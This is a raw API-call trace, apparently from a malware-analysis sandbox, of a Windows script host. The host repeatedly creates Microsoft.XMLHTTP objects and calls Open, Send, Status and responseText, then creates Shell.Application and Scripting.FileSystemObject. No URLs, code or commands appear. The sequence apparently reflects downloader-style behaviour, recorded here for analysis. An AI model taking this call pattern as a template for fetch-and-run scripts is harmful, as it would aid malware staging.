	[0786.036] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0786.036] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0786.037] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0786.037] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0786.037] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0786.037] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0786.037] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0786.037] longjmp () 
	[0786.037] longjmp () 
	[0786.037] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0786.037] SysStringLen (param_1=0x0) returned 0x0
	[0786.037] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0786.038] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0786.038] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0786.038] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0786.038] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0786.038] ??2@YAPEAX_K@Z () returned 0x62f330
	[0786.038] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
	[0786.038] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0786.038] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0786.038] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0786.038] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0786.038] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0786.038] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0786.039] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0786.039] longjmp () 
	[0786.039] longjmp () 
	[0786.039] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0786.039] SysStringLen (param_1=0x0) returned 0x0
	[0786.039] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0786.039] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0786.039] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0786.039] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0786.039] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0786.040] ??2@YAPEAX_K@Z () returned 0x62f310
	[0786.040] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0786.040] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0786.040] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0786.040] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0786.040] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0786.040] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0786.040] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0786.040] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0786.040] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0786.041] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0786.041] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0789.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0789.125] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0789.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0789.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0789.125] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0789.125] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0789.126] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0789.126] SysStringLen (param_1=0x0) returned 0x0
	[0789.126] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0789.126] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0789.126] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0789.126] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0789.126] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0789.126] ??2@YAPEAX_K@Z () returned 0x62f350
	[0789.126] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0789.126] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0789.126] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0789.126] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0789.126] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0789.127] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0789.127] SysStringLen (param_1=0x0) returned 0x0
	[0789.127] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0789.130] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0789.130] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0789.130] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0789.130] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0789.130] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0789.131] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0790.587] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0790.588] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0790.588] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0790.589] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0790.589] SysStringLen (param_1=0x0) returned 0x0
	[0790.589] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0790.589] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0790.590] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0790.590] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0790.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0790.590] ??2@YAPEAX_K@Z () returned 0x62f310
	[0790.590] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0790.590] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0790.590] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0790.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0790.590] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0790.590] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0790.590] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0790.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0790.593] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0790.593] SysStringLen (param_1=0x0) returned 0x0
	[0790.593] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0790.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0790.593] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0790.593] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0790.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0790.593] ??2@YAPEAX_K@Z () returned 0x62f330
